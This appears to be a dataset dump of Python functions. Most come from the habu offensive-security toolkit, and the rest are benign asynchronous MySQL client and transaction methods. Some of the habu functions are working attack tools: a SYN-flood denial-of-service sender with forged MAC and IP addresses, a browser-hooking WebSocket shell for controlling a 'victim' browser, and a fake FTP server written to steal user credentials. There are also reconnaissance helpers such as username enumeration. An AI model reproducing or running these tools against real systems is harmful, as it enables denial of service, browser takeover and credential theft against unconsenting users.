    requested via `browser`).  Returns False when no usable browser is in
    PATH, True once a screenshot command has been launched (even if it
    times out after DURATION seconds).
    """
    valid_browsers = ['firefox', 'chromium-browser']
    available_browsers = [ b for b in valid_browsers if which(b) ]

    if not available_browsers:
        # BUG FIX: the original called .format(browser) on this message even
        # though it has no placeholder; the dead call has been removed.
        print("You don't have firefox or chromium-browser in your PATH", file=sys.stderr)
        return False

    if not browser:
        browser = available_browsers[0]

    if browser not in available_browsers:
        print("You don't have {} in your PATH".format(browser), file=sys.stderr)
        return False

    if browser == 'firefox':
        # A dedicated profile keeps the headless run from touching the
        # user's normal profile.
        profile_firefox = shlex.split('firefox --new-instance --CreateProfile habu.web.screenshot')
        subprocess.Popen(profile_firefox, stderr=subprocess.DEVNULL)
        screenshot_cmd = shlex.split('firefox --new-instance --headless -P habu.web.screenshot --screenshot {} {}'.format(outfile, url))

    if browser == 'chromium-browser':
        screenshot_cmd = shlex.split('chromium-browser --headless --disable-gpu --window-size=1440,900 --screenshot={} {}'.format(outfile, url))

    outfile = Path(outfile)

    # Remove any stale screenshot so the existence poll below is reliable.
    if outfile.is_file():
        outfile.unlink()

    with subprocess.Popen(screenshot_cmd, stderr=subprocess.DEVNULL) as proc:
        # Poll once per second, up to DURATION seconds, for the file to appear.
        for count in range(DURATION):
            sleep(1)
            if outfile.is_file():
                break
            if count == DURATION - 1:
                print("Unable to create screenshot", file=sys.stderr)
                break
        proc.kill()

    return True
python
{ "resource": "" }
q29732
cmd_config_set
train
def cmd_config_set(key, value):
    """Set VALUE to the config KEY.

    Note: By default, KEY is converted to uppercase.

    Example:

    \b
    $ habu.config.set DNS_SERVER 8.8.8.8
    """
    # Load the on-disk settings only (ignore environment overrides) so we
    # don't persist values that came from the environment.
    settings = loadcfg(environment=False)
    settings[key.upper()] = value

    cfgfile = Path('~/.habu.json').expanduser()
    cfgfile.write_text(json.dumps(settings, indent=4, sort_keys=True))
python
{ "resource": "" }
q29733
cmd_cymon_ip_timeline
train
def cmd_cymon_ip_timeline(ip, no_cache, verbose, output, pretty):
    """Simple cymon API client.

    Prints the JSON result of a cymon IP timeline query.

    Example:

    \b
    $ habu.cymon.ip.timeline 8.8.8.8
    {
        "timeline": [
            {
                "time_label": "Aug. 18, 2018",
                "events": [
                    {
                        "description": "Posted: 2018-08-18 23:37:39 CEST IDS Alerts: 0 URLQuery Alerts: 1 ...",
                        "created": "2018-08-18T21:39:07Z",
                        "title": "Malicious activity reported by urlquery.net",
                        "details_url": "http://urlquery.net/report/b1393866-9b1f-4a8e-b02b-9636989050f3",
                        "tag": "malicious activity"
                    }
                ]
            },
            ...
    """
    habucfg = loadcfg()

    # Guard clause: an API key is mandatory.
    if 'CYMON_APIKEY' not in habucfg:
        print('You must provide a cymon apikey. Use the ~/.habu.json file (variable CYMON_APIKEY), or export the variable HABU_CYMON_APIKEY')
        print('Get your API key from https://www.cymon.io/')
        sys.exit(1)

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if not no_cache:
        # Cache API responses under the user's home directory.
        homedir = pwd.getpwuid(os.getuid()).pw_dir
        requests_cache.install_cache(homedir + '/.habu_requests_cache')

    url = 'https://www.cymon.io:443/api/nexus/v1/ip/{}/timeline/'.format(ip)
    headers = {'Authorization': 'Token {}'.format(habucfg['CYMON_APIKEY'])}

    r = requests.get(url, headers=headers)

    if r.status_code == 404:
        print("Not Found")
        return False

    if r.status_code != 200:
        print('ERROR', r)
        return False

    data = r.json()

    output.write(pretty_print(data) if pretty else json.dumps(data, indent=4))
    output.write('\n')
python
{ "resource": "" }
q29734
gather_details
train
def gather_details():
    """Get details about the host that is executing habu.

    Every field is collected best-effort: a probe that is unavailable on this
    platform/Python version yields an empty value instead of discarding the
    whole result.  (The original wrapped all probes in one try/except
    AttributeError and returned {} as soon as any attribute was missing —
    which is always the case on Python >= 3.8, where
    platform.linux_distribution() was removed.)
    """
    def _probe(func, default=''):
        # One guarded call per field so a single failure can't wipe the rest.
        try:
            return func()
        except Exception:
            return default

    # platform.linux_distribution() was removed in Python 3.8.
    distribution_probe = getattr(platform, 'linux_distribution', None)
    distribution = _probe(distribution_probe, default=()) if distribution_probe else ()

    return {
        'kernel': _probe(platform.uname),
        'distribution': distribution,
        'libc': _probe(platform.libc_ver, default=()),
        'arch': _probe(platform.machine),
        'python_version': _probe(platform.python_version),
        'os_name': _probe(platform.system),
        'static_hostname': _probe(platform.node),
        'cpu': _probe(platform.processor),
        'fqdn': _probe(socket.getfqdn),
    }
python
{ "resource": "" }
q29735
get_internal_ip
train
def get_internal_ip():
    """Get the local IP addresses."""
    nics = {}

    for interface_name in interfaces():
        addresses = ifaddresses(interface_name)
        try:
            entry = {
                'ipv4': addresses[AF_INET],
                'link_layer': addresses[AF_LINK],
                'ipv6': addresses[AF_INET6],
            }
        except KeyError:
            # Skip interfaces missing any of the three address families.
            continue
        nics[interface_name] = entry

    return nics
python
{ "resource": "" }
q29736
geo_location
train
def geo_location(ip_address):
    """Get the Geolocation of an IP address.

    Returns the JSON payload from ipapi.co as a dict, or {} when the
    argument is not a valid IPv4/IPv6 address.
    """
    try:
        # Validation only: raises ValueError on anything that is not an IP.
        # (The original wrapped this in a no-op type() call, now removed.)
        ipaddress.ip_address(ip_address)
    except ValueError:
        return {}

    return requests.get(
        'https://ipapi.co/{}/json/'.format(ip_address), timeout=5).json()
python
{ "resource": "" }
q29737
cmd_nmap_ports
train
def cmd_nmap_ports(scanfile, protocol):
    """Read an nmap report and print the tested ports.

    Print the ports that has been tested reading the generated nmap output.

    You can use it to rapidly reutilize the port list for the input of other
    tools.

    Supports and detects the 3 output formats (nmap, gnmap and xml)

    Example:

    \b
    # habu.nmap.ports portantier.nmap
    21,22,23,80,443
    """
    data = scanfile.read()
    fmt = detect_format(data)

    # Dispatch on the detected nmap output flavour.
    parsers = {
        'nmap': parse_format_nmap,
        'gnmap': parse_format_gnmap,
        'xml': parse_format_xml,
    }

    parser = parsers.get(fmt)

    if parser is None:
        print('Unknown file format.', file=sys.stdout)
        return 1

    print(parser(data, protocol), end='')
    return True
python
{ "resource": "" }
q29738
cmd_web_report
train
def cmd_web_report(input_file, verbose, browser):
    """Uses Firefox or Chromium to take a screenshot of the websites.
    Makes a report that includes the HTTP headers.
    The expected format is one url per line.

    Creates a directory called 'report' with the content inside.

    \b
    $ echo https://www.portantier.com | habu.web.report
    """
    urls = input_file.read().decode().strip().split('\n')

    report_dir = Path('report')
    # Bug fix: the original swallowed *every* mkdir error; only an
    # already-existing directory is acceptable here.
    report_dir.mkdir(exist_ok=True)

    report_file = report_dir / 'index.html'

    with report_file.open('w') as outfile:
        outfile.write('<!doctype html>\n')
        outfile.write('<html lang=en-us>\n')
        outfile.write('<meta charset=utf-8>\n')
        outfile.write('<title>habu.web.report</title>\n')
        outfile.write('<body>\n')
        outfile.write('<table border=1 style="max-width: 100%">\n')

        for i, url in enumerate(sorted(urls)):
            error = False
            # Progress goes to stderr so stdout stays clean.
            print(i, url, file=sys.stderr)
            outfile.write('<tr>\n')
            outfile.write('<td style="vertical-align:top;max-width:30%">\n')
            outfile.write('<p><strong>' + html.escape(url) + '</strong></p>\n')

            try:
                req = urllib.request.Request(url, method='HEAD')
                # Bug fix: without a timeout one unresponsive host could
                # hang the whole report forever.
                resp = urllib.request.urlopen(req, timeout=10)
                outfile.write('<pre style="white-space: pre-wrap;">' + html.escape(str(resp.headers)) + '</pre>\n')
            except Exception as e:
                outfile.write('<pre>ERROR: ' + html.escape(str(e)) + '</pre>\n')
                error = True

            outfile.write('</td><td>')
            if not error:
                # Only screenshot hosts that answered the HEAD request.
                web_screenshot(url, report_dir / '{}.png'.format(i), browser=browser)
                outfile.write('<img src={}.png style="max-width: 100%" />\n'.format(i))
            outfile.write('</td>\n')
            outfile.write('</tr>\n')

        outfile.write('</table>\n')
        outfile.write('</body>\n')
        outfile.write('</html>\n')
python
{ "resource": "" }
q29739
cmd_synflood
train
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):
    """Launch a lot of TCP connections and keeps them opened.

    Some very old systems can suffer a Denial of Service with this.

    Reference: https://en.wikipedia.org/wiki/SYN_flood

    Example:

    \b
    # sudo habu.synflood 172.16.0.10
    .................

    Each dot is a packet sent.

    You can use the options '-2' and '-3' to forge the layer 2/3
    addresses. If you use them, each connection will be sent from a
    random layer2 (MAC) and/or layer3 (IP) address.

    You can choose the number of connections to create with the option
    '-c'. The default is never stop creating connections.

    Note: If you send the packets from your real IP address and you want
    to keep the connections half-open, you need to setup for firewall to
    don't send the RST packets.
    """
    conf.verb = False

    if interface:
        conf.iface = interface

    layer2 = Ether()

    layer3 = IP()
    layer3.dst = ip

    layer4 = TCP()
    layer4.dport = port

    pkt = layer2 / layer3 / layer4

    counter = 0

    print("Please, remember to block your RST responses", file=sys.stderr)

    while True:
        if forgeip:
            # Randomize only the last octet so the forged source stays
            # inside the same /24 as the real address.
            pkt[IP].src = "%s.%s" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))
        if forgemac:
            pkt[Ether].src = RandMAC()

        # A fresh ephemeral source port for every SYN.
        pkt[TCP].sport = randint(10000, 65000)

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        sendp(pkt)

        counter += 1

        # count == 0 means "never stop".
        if count != 0 and counter == count:
            break

    return True
python
{ "resource": "" }
q29740
cmd_usercheck
train
def cmd_usercheck(username, no_cache, verbose, wopen):
    """Check if the given username exists on various social networks and
    other popular sites.

    \b
    $ habu.usercheck portantier
    {
        "aboutme": "https://about.me/portantier",
        "disqus": "https://disqus.com/by/portantier/",
        "github": "https://github.com/portantier/",
        "ifttt": "https://ifttt.com/p/portantier",
        "lastfm": "https://www.last.fm/user/portantier",
        "medium": "https://medium.com/@portantier",
        "pastebin": "https://pastebin.com/u/portantier",
        "pinterest": "https://in.pinterest.com/portantier/",
        "twitter": "https://twitter.com/portantier",
        "vimeo": "https://vimeo.com/portantier"
    }
    """
    # NOTE(review): loaded but never read below — presumably kept for its
    # side effects; confirm before removing.
    habucfg = loadcfg()

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    # Cache HTTP responses on disk unless --no-cache was given.
    if not no_cache:
        homedir = pwd.getpwuid(os.getuid()).pw_dir
        requests_cache.install_cache(homedir + '/.habu_requests_cache')
        logging.info('using cache on ' + homedir + '/.habu_requests_cache')

    existent = {}

    for site, url in urls.items():
        u = url.format(username)

        logging.info(u)

        try:
            r = requests.head(u, allow_redirects=False)
        except Exception:
            # A network failure for one site must not abort the scan.
            continue

        if r.status_code == 200:
            # Sanity check: sites that answer 200 for a nonsense username
            # would produce false positives, so probe a bogus user first.
            if requests.head(url.format('zei4fee3q9'), allow_redirects=False).status_code == 200:
                logging.error('Received status 200 for user zei4fee3q9, maybe, the check needs to be fixed')
            else:
                existent[site] = u
                if wopen:
                    webbrowser.open_new_tab(u)

    print(json.dumps(existent, indent=4))
python
{ "resource": "" }
q29741
cmd_dhcp_discover
train
def cmd_dhcp_discover(iface, timeout, verbose):
    """Send a DHCP request and show what devices has replied.

    Note: Using '-v' you can see all the options (like DNS servers)
    included on the responses.

    \b
    # habu.dhcp_discover
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.5:bootpc / BOOTP / DHCP
    """
    conf.verb = False

    if iface:
        conf.iface = iface

    # Replies come from a server IP we don't know yet, so scapy must not
    # match answers by IP address.
    conf.checkIPaddr = False

    hw = get_if_raw_hwaddr(conf.iface)

    # DHCPDISCOVER: L2 broadcast, from 0.0.0.0 to 255.255.255.255,
    # client port 68 -> server port 67.
    ether = Ether(dst="ff:ff:ff:ff:ff:ff")
    ip = IP(src="0.0.0.0", dst="255.255.255.255")
    udp = UDP(sport=68, dport=67)
    bootp = BOOTP(chaddr=hw)
    dhcp = DHCP(options=[("message-type", "discover"), "end"])

    dhcp_discover = ether / ip / udp / bootp / dhcp

    # Bug fix: the timeout option was accepted but ignored; the wait was
    # hardcoded to 5 seconds. Honor the user-supplied value.
    ans, unans = srp(dhcp_discover, multi=True, timeout=timeout)

    for _, pkt in ans:
        if verbose:
            print(pkt.show())
        else:
            print(pkt.summary())
python
{ "resource": "" }
q29742
cmd_nmap_excluded
train
def cmd_nmap_excluded(lowest, highest):
    """Prints a random port that is not present on nmap-services file so
    is not scanned automatically by nmap.

    Useful for services like SSH or RDP, that are continuously scanned
    on their default ports.

    Example:

    \b
    # habu.nmap.excluded
    58567
    """
    if lowest >= highest:
        # Bug fix: the original only logged this and then kept running
        # with an empty range, ending in a misleading "can't find" error.
        logging.error('lowest can not be greater or equal than highest')
        return 1

    cfg = loadcfg()

    with (cfg['DATADIR'] / 'nmap-services').open() as nsf:
        nmap_services = nsf.read()

    # Collect every port number that nmap scans by default.
    unwanted = set()
    for line in nmap_services.strip().split('\n'):
        if line.startswith('#'):
            continue
        service, port, _ = line.split('\t', maxsplit=2)
        unwanted.add(int(port.split('/')[0]))

    # Try candidate ports in random order until one is outside the list.
    choices = list(range(lowest, highest))
    random.shuffle(choices)

    for choice in choices:
        if choice not in unwanted:
            print(choice)
            return 0

    logging.error('Can\'t find a port number with the specified parameters')
    return 1
python
{ "resource": "" }
q29743
cmd_jshell
train
def cmd_jshell(ip, port, verbose):
    """Control a web browser through Websockets.

    Bind a port (default: 3333) and listen for HTTP connections.

    On connection, send a JavaScript code that opens a WebSocket that
    can be used to send commands to the connected browser.

    You can write the commands directly in the shell, or use plugins,
    that are simply external JavaScript files.

    Using habu.jshell you can completely control a web browser.

    Reference: https://developer.mozilla.org/en-US/docs/Web/API/WebSockets_API

    Example:

    \b
    $ habu.jshell
    >> Listening on 192.168.0.10:3333. Waiting for a victim connection.
    >> HTTP Request received from 192.168.0.15. Sending hookjs
    >> Connection from 192.168.0.15
    $ _sessions
    0 * 192.168.0.15:33432 Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
    $ document.location
    http://192.168.0.10:3333/
    """
    # The hook template carries placeholders for the listen address so
    # the victim's browser knows where to open the WebSocket back to.
    global hook_js
    hook_js = hook_js.format(ip=ip, port=port)

    print('>>> Listening on {}:{}. Waiting for a victim connection.'.format(ip, port))

    # The websocket server runs on a background thread; the foreground
    # thread drives the interactive prompt.
    eventloop = asyncio.get_event_loop()
    eventloop.run_until_complete(websockets.serve(handler, ip, port, create_protocol=MyWebSocketServerProtocol))
    thread = threading.Thread(target=eventloop.run_forever)
    thread.start()

    # Tab completion covers JS snippets plus the runner's commands.
    completer = WordCompleter(completer_list + list(runner.internal_commands) + list(runner.external_commands))
    history = InMemoryHistory()

    while True:
        # Exit the prompt loop when the server thread dies.
        if not thread.is_alive():
            break

        cmd = prompt('$ ', patch_stdout=True, completer=completer, history=history, lexer=PygmentsLexer(JavascriptLexer))

        if cmd:
            if cmd == '_help':
                runner.cmd_help()
            elif runner.sessions:
                # Commands are queued and picked up by the websocket
                # handler that talks to the hooked browser.
                queue.put_nowait(cmd)
            else:
                print('>>> No active session!')
python
{ "resource": "" }
q29744
cmd_xor
train
def cmd_xor(k, i, o):
    """XOR cipher.

    Note: XOR is not a 'secure cipher'. If you need strong crypto you
    must use algorithms like AES. You can use habu.fernet for that.

    Example:

    \b
    $ habu.xor -k mysecretkey -i /bin/ls > xored
    $ habu.xor -k mysecretkey -i xored > uxored
    $ sha1sum /bin/ls uxored
    $ 6fcf930fcee1395a1c95f87dd38413e02deff4bb  /bin/ls
    $ 6fcf930fcee1395a1c95f87dd38413e02deff4bb  uxored
    """
    plaintext = i.read()
    key_bytes = k.encode()
    o.write(xor(plaintext, key_bytes))
python
{ "resource": "" }
q29745
cmd_server_ftp
train
def cmd_server_ftp(address, port, enable_ssl, ssl_cert, ssl_key, verbose):
    """Basic fake FTP server, with the only purpose to steal user
    credentials. Supports SSL/TLS.

    Example:

    \b
    # sudo habu.server.ftp --ssl --ssl-cert /tmp/cert.pem --ssl-key /tmp/key.pem
    Listening on port 21
    Accepted connection from ('192.168.0.27', 56832)
    Credentials collected from 192.168.0.27! fabian 123456
    """
    ssl_context = None

    if enable_ssl:
        if not (ssl_cert and ssl_key):
            print('Please, specify --ssl-cert and --ssl-key to enable SSL/TLS')
            return False
        # Server-side context; hostname checking is irrelevant because
        # this side only accepts connections.
        ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        ssl_context.check_hostname = False
        ssl_context.load_cert_chain(ssl_cert, ssl_key)

    loop = asyncio.get_event_loop()
    coro = loop.create_server(ServerFTP, host=address, port=port, ssl=ssl_context, reuse_address=True, reuse_port=True)
    server = loop.run_until_complete(coro)

    # Binding port 21 needs root; drop privileges once the socket is
    # bound so the server itself does not keep running as root.
    drop_privileges()

    print('Listening on port {}'.format(port))

    try:
        loop.run_forever()
    finally:
        server.close()
        loop.close()
python
{ "resource": "" }
q29746
cmd_whois_domain
train
def cmd_whois_domain(domain):
    """Simple whois client to check domain names.

    Example:

    \b
    $ habu.whois.domain portantier.com
    {
        "domain_name": "portantier.com",
        "registrar": "Amazon Registrar, Inc.",
        "whois_server": "whois.registrar.amazon.com",
        ...
    """
    # The whois library is noisy with warnings; silence them.
    warnings.filterwarnings("ignore")

    raw = whois.whois(domain)
    cleaned = remove_duplicates(raw)

    print(json.dumps(cleaned, indent=4, default=str))
python
{ "resource": "" }
q29747
cmd_gateway_find
train
def cmd_gateway_find(network, iface, host, tcp, dport, timeout, verbose):
    """Try to reach an external IP using any host has a router.

    Useful to find routers in your network.

    First, uses arping to detect alive hosts and obtain MAC addresses.

    Later, create a network packet and put each MAC address as
    destination.

    Last, print the devices that forwarded correctly the packets.

    Example:

    \b
    # habu.find.gateway 192.168.0.0/24
    192.168.0.1 a4:08:f5:19:17:a4 Sagemcom
    192.168.0.7 b0:98:2b:5d:22:70 Sagemcom
    192.168.0.8 b0:98:2b:5d:1f:e8 Sagemcom
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    # Step 1: ARP-scan the local network to learn (MAC, IP) pairs of
    # alive neighbors. (The arping wait is fixed at 2s; the --timeout
    # option applies only to the probe below.)
    res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=network), timeout=2)

    neighbors = set()

    for _, pkt in res:
        neighbors.add((pkt['Ether'].src, pkt['Ether'].psrc))

    # Step 2: address a probe for the external host to each neighbor's
    # MAC. Only a device willing to route our traffic will reply.
    for mac,ip in neighbors:
        if tcp:
            res, unans = srp(Ether(dst=mac)/IP(dst=host)/TCP(dport=dport), timeout=timeout)
        else:
            res, unans = srp(Ether(dst=mac)/IP(dst=host)/ICMP(), timeout=timeout)

        for _,pkt in res:
            if pkt:
                if verbose:
                    print(pkt.show())
                else:
                    # IP, MAC and the vendor from scapy's manufacturer DB.
                    print(ip, mac, conf.manufdb._get_manuf(mac))
python
{ "resource": "" }
q29748
cmd_extract_email
train
def cmd_extract_email(infile, verbose, jsonout):
    """Extract email addresses from a file or stdin.

    Example:

    \b
    $ cat /var/log/auth.log | habu.extract.email
    john@securetia.com
    raven@acmecorp.net
    nmarks@fimax.com
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    data = infile.read()

    # Delegate the pattern matching to the shared helper. (The original
    # had a dead `result = []` assignment here, immediately overwritten.)
    result = extract_email(data)

    if jsonout:
        print(json.dumps(result, indent=4))
    else:
        print('\n'.join(result))
python
{ "resource": "" }
q29749
cmd_karma_bulk
train
def cmd_karma_bulk(infile, jsonout, badonly, verbose):
    """Show which IP addresses are inside blacklists using the Karma
    online service.

    Example:

    \b
    $ cat /var/log/auth.log | habu.extract.ipv4 | habu.karma.bulk
    172.217.162.4   spamhaus_drop,alienvault_spamming
    23.52.213.96    CLEAN
    190.210.43.70   alienvault_malicious
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    data = infile.read()

    result = {}

    for ip in data.split('\n'):
        if not ip:
            continue
        logging.info('Checking ' + ip)
        # karma() returns the list of blacklists the IP appears in,
        # or a falsy value when it is clean.
        response = karma(ip)
        if response:
            result[ip] = response
        elif not badonly:
            result[ip] = ['CLEAN']

    if jsonout:
        print(json.dumps(result, indent=4))
    else:
        for address, lists in result.items():
            print(address, '\t', ','.join(lists))
python
{ "resource": "" }
q29750
Pool.terminate
train
def terminate(self):
    """Terminate the pool immediately.

    Like close(), but additionally force-closes every connection that is
    currently acquired by a user, records each one as terminated, and
    empties the in-use set.
    """
    self.close()

    in_use = list(self._used)
    for connection in in_use:
        connection.close()
        self._terminated.add(connection)

    self._used.clear()
python
{ "resource": "" }
q29751
Cursor.execute
train
async def execute(self, query, args=None):
    """Executes the given operation

    Executes the given operation substituting any markers with
    the given parameters. For example, getting all rows where id is 5:
    cursor.execute("SELECT * FROM t1 WHERE id = %s", (5,))

    :param query: ``str`` sql statement
    :param args: ``tuple`` or ``list`` of arguments for sql query
    :returns: ``int``, number of rows that has been produced of affected
    """
    conn = self._get_db()

    # Drain any pending result sets from a previous multi-statement
    # query before issuing a new one.
    while (await self.nextset()):
        pass

    if args is not None:
        # Client-side parameter substitution: arguments are escaped by
        # the connection and interpolated into the query string.
        query = query % self._escape_args(args, conn)

    await self._query(query)
    self._executed = query
    if self._echo:
        logger.info(query)
        logger.info("%r", args)
    return self._rowcount
python
{ "resource": "" }
q29752
Cursor.executemany
train
async def executemany(self, query, args):
    """Execute the given operation multiple times

    The executemany() method will execute the operation iterating
    over the list of parameters in seq_params.

    Example: Inserting 3 new employees and their phone number

    data = [
        ('Jane','555-001'),
        ('Joe', '555-001'),
        ('John', '555-003')
        ]
    stmt = "INSERT INTO employees (name, phone)
        VALUES ('%s','%s')"
    await cursor.executemany(stmt, data)

    INSERT or REPLACE statements are optimized by batching the data,
    that is using the MySQL multiple rows syntax.

    :param query: `str`, sql statement
    :param args: ``tuple`` or ``list`` of arguments for sql query
    """
    if not args:
        return

    if self._echo:
        logger.info("CALL %s", query)
        logger.info("%r", args)

    m = RE_INSERT_VALUES.match(query)
    if m:
        # Fast path: INSERT/REPLACE ... VALUES (...) can be batched into
        # MySQL's multi-row syntax in a single statement.
        q_prefix = m.group(1)
        q_values = m.group(2).rstrip()
        q_postfix = m.group(3) or ''
        assert q_values[0] == '(' and q_values[-1] == ')'
        return (await self._do_execute_many(
            q_prefix, q_values, q_postfix, args,
            self.max_stmt_length,
            self._get_db().encoding))
    else:
        # Generic path: run the statement once per argument set and
        # accumulate the affected row counts.
        rows = 0
        for arg in args:
            await self.execute(query, arg)
            rows += self._rowcount
        self._rowcount = rows
    return self._rowcount
python
{ "resource": "" }
q29753
SSCursor.fetchall
train
async def fetchall(self):
    """Fetch every remaining row, as per MySQLdb.

    Note: this buffers the whole result in memory, which defeats the
    point of a server-side cursor for very large queries; prefer
    iterating row by row in that case.
    """
    collected = []
    row = await self.fetchone()
    while row is not None:
        collected.append(row)
        row = await self.fetchone()
    return collected
python
{ "resource": "" }
q29754
Connection.close
train
def close(self):
    """Close the underlying socket connection, if any.

    Safe to call repeatedly: after the first call the writer reference
    is dropped, so subsequent calls are no-ops.
    """
    if not self._writer:
        return
    self._writer.transport.close()
    self._writer = None
    self._reader = None
python
{ "resource": "" }
q29755
Connection.ensure_closed
train
async def ensure_closed(self):
    """Send quit command and then close socket connection"""
    if self._writer is None:
        # connection has been closed
        return
    # COM_QUIT packet: 4-byte little-endian payload length (1) followed
    # by the command byte; no sequence handling needed for QUIT.
    send_data = struct.pack('<i', 1) + int2byte(COMMAND.COM_QUIT)
    self._writer.write(send_data)
    await self._writer.drain()
    self.close()
python
{ "resource": "" }
q29756
Connection.cursor
train
def cursor(self, *cursors):
    """Instantiates and returns a cursor

    By default, :class:`Cursor` is returned. It is possible to also give a
    custom cursor through the cursor_class parameter, but it needs to
    be a subclass  of :class:`Cursor`

    :param cursor: custom cursor class.
    :returns: instance of cursor, by default :class:`Cursor`
    :raises TypeError: cursor_class is not a subclass of Cursor.
    """
    self._ensure_alive()
    self._last_usage = self._loop.time()
    try:
        if cursors and \
                any(not issubclass(cursor, Cursor) for cursor in cursors):
            raise TypeError('Custom cursor must be subclass of Cursor')
    except TypeError:
        # issubclass() itself raises TypeError when given a non-class;
        # normalize both failure modes into the same error message.
        raise TypeError('Custom cursor must be subclass of Cursor')

    if cursors and len(cursors) == 1:
        cur = cursors[0](self, self._echo)
    elif cursors:
        # Several mixin classes: synthesize a combined subclass whose
        # name concatenates the mixin names (minus repeated 'Cursor').
        cursor_name = ''.join(map(lambda x: x.__name__, cursors)) \
                          .replace('Cursor', '') + 'Cursor'
        cursor_class = type(cursor_name, cursors, {})
        cur = cursor_class(self, self._echo)
    else:
        cur = self.cursorclass(self, self._echo)

    # Wrap the cursor in an already-resolved future so callers can use
    # both `await conn.cursor()` and `async with conn.cursor()`.
    fut = self._loop.create_future()
    fut.set_result(cur)
    return _ContextManager(fut)
python
{ "resource": "" }
q29757
Connection.ping
train
async def ping(self, reconnect=True):
    """Check if the server is alive.

    :param reconnect: when True, transparently reconnect (once) if the
        connection is closed or the ping fails; when False, raise
        instead.
    """
    if self._writer is None and self._reader is None:
        if reconnect:
            await self._connect()
            reconnect = False
        else:
            raise Error("Already closed")
    try:
        await self._execute_command(COMMAND.COM_PING, "")
        await self._read_ok_packet()
    except Exception:
        if reconnect:
            # One reconnect attempt, then retry the ping with
            # reconnect=False so a second failure propagates instead of
            # recursing forever.
            await self._connect()
            await self.ping(False)
        else:
            raise
python
{ "resource": "" }
q29758
Connection.write_packet
train
def write_packet(self, payload):
    """Write one complete "mysql packet" to the network.

    The wire format is a 3-byte little-endian payload length, a 1-byte
    sequence id, then the payload itself; the sequence id wraps at 256.
    """
    # Internal note: when you build packet manually and calls
    # _write_bytes() directly, you should set self._next_seq_id properly.
    header = pack_int24(len(payload)) + int2byte(self._next_seq_id)
    self._write_bytes(header + payload)
    self._next_seq_id = (self._next_seq_id + 1) % 256
python
{ "resource": "" }
q29759
MySQLResult._read_rowdata_packet
train
async def _read_rowdata_packet(self):
    """Read a rowdata packet for each data row in the result set."""
    rows = []
    while True:
        packet = await self.connection._read_packet()
        if self._check_packet_is_eof(packet):
            # release reference to kill cyclic reference.
            self.connection = None
            break
        rows.append(self._read_row_from_packet(packet))

    # For a plain result set the affected-row count is the row count.
    self.affected_rows = len(rows)
    self.rows = tuple(rows)
python
{ "resource": "" }
q29760
MySQLResult._get_descriptions
train
async def _get_descriptions(self):
    """Read a column descriptor packet for each column in the result."""
    self.fields = []
    self.converters = []
    use_unicode = self.connection.use_unicode
    conn_encoding = self.connection.encoding
    description = []

    # One FieldDescriptorPacket per column, in order.
    for i in range(self.field_count):
        field = await self.connection._read_packet(
            FieldDescriptorPacket)
        self.fields.append(field)
        description.append(field.description())
        field_type = field.type_code
        if use_unicode:
            if field_type == FIELD_TYPE.JSON:
                # When SELECT from JSON column: charset = binary
                # When SELECT CAST(... AS JSON): charset = connection
                # encoding
                # This behavior is different from TEXT / BLOB.
                # We should decode result by connection encoding
                # regardless charsetnr.
                # See https://github.com/PyMySQL/PyMySQL/issues/488
                encoding = conn_encoding  # SELECT CAST(... AS JSON)
            elif field_type in TEXT_TYPES:
                if field.charsetnr == 63:  # binary
                    # TEXTs with charset=binary means BINARY types.
                    encoding = None
                else:
                    encoding = conn_encoding
            else:
                # Integers, Dates and Times, and other basic data
                # is encoded in ascii
                encoding = 'ascii'
        else:
            encoding = None
        converter = self.connection.decoders.get(field_type)
        if converter is through:
            converter = None
        # Each column gets an (encoding, converter) pair used later
        # when rows are decoded.
        self.converters.append((encoding, converter))

    # Column descriptors are terminated by an EOF packet.
    eof_packet = await self.connection._read_packet()
    assert eof_packet.is_eof_packet(), 'Protocol error, expecting EOF'
    self.description = tuple(description)
python
{ "resource": "" }
q29761
Transaction.rollback
train
async def rollback(self):
    """Roll back this transaction.

    A no-op when the parent (root) transaction is no longer active;
    otherwise performs the rollback and marks this transaction inactive.
    """
    if self._parent._is_active:
        await self._do_rollback()
        self._is_active = False
python
{ "resource": "" }
q29762
TwoPhaseTransaction.prepare
train
async def prepare(self):
    """Prepare this TwoPhaseTransaction.

    After a PREPARE, the transaction can be committed.

    :raises InvalidRequestError: if the parent transaction is inactive.
    """
    if not self._parent.is_active:
        raise exc.InvalidRequestError("This transaction is inactive")
    connection = self._connection
    await connection._prepare_twophase_impl(self._xid)
    self._is_prepared = True
python
{ "resource": "" }
q29763
SAConnection.execute
train
def execute(self, query, *multiparams, **params):
    """Executes a SQL query with optional parameters.

    query - a SQL query string or any sqlalchemy expression.

    *multiparams/**params - represent bound parameter values to be
    used in the execution.  Typically, the format is a dictionary
    passed to *multiparams:

        await conn.execute(
            table.insert(),
            {"id":1, "value":"v1"},
        )

    ...or individual key/values interpreted by **params::

        await conn.execute(
            table.insert(), id=1, value="v1"
        )

    In the case that a plain SQL string is passed, a tuple or
    individual values in \*multiparams may be passed::

        await conn.execute(
            "INSERT INTO table (id, value) VALUES (%d, %s)",
            (1, "v1")
        )

        await conn.execute(
            "INSERT INTO table (id, value) VALUES (%s, %s)",
            1, "v1"
        )

    Returns ResultProxy instance with results of SQL query execution.
    """
    # The coroutine is wrapped so callers may either `await` it or use
    # it as an async context manager.
    coro = self._execute(query, *multiparams, **params)
    return _SAConnectionContextManager(coro)
python
{ "resource": "" }
q29764
SAConnection.scalar
train
async def scalar(self, query, *multiparams, **params):
    """Execute a SQL query and return a single scalar value
    (the first column of the first row).
    """
    result_proxy = await self.execute(query, *multiparams, **params)
    value = await result_proxy.scalar()
    return value
python
{ "resource": "" }
q29765
SAConnection.begin_nested
train
async def begin_nested(self):
    """Begin a nested transaction and return a transaction handle.

